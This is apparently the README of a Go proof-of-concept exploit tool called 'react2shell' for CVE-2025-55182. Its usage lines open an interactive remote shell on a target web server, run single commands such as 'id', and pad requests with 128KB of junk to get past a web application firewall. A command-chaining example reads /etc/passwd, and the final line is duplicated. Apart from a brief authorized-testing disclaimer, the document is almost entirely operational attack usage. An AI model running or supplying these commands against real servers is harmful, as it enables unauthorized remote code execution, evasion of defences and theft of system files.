
react2shell PoC with Go / CVE-2025-55182
CVE-2025-55182 PoC
# Interactive shell
./react2shell -u http://target:3000
# Single command
./react2shell -u http://target:3000 -c "id"
# WAF bypass (128KB junk data)
./react2shell -u http://target:3000 -waf 128
go build -o react2shell .
| Flag | Description |
|---|---|
-u | Target URL |
-c | Single command (optional) |
-waf | WAF bypass junk size in KB (optional) |
; or && to chain commands: cd /etc && cat passwdFor authorized security testing only.
; or && to chain commands: cd /etc && cat passwdFor authorized security testing only.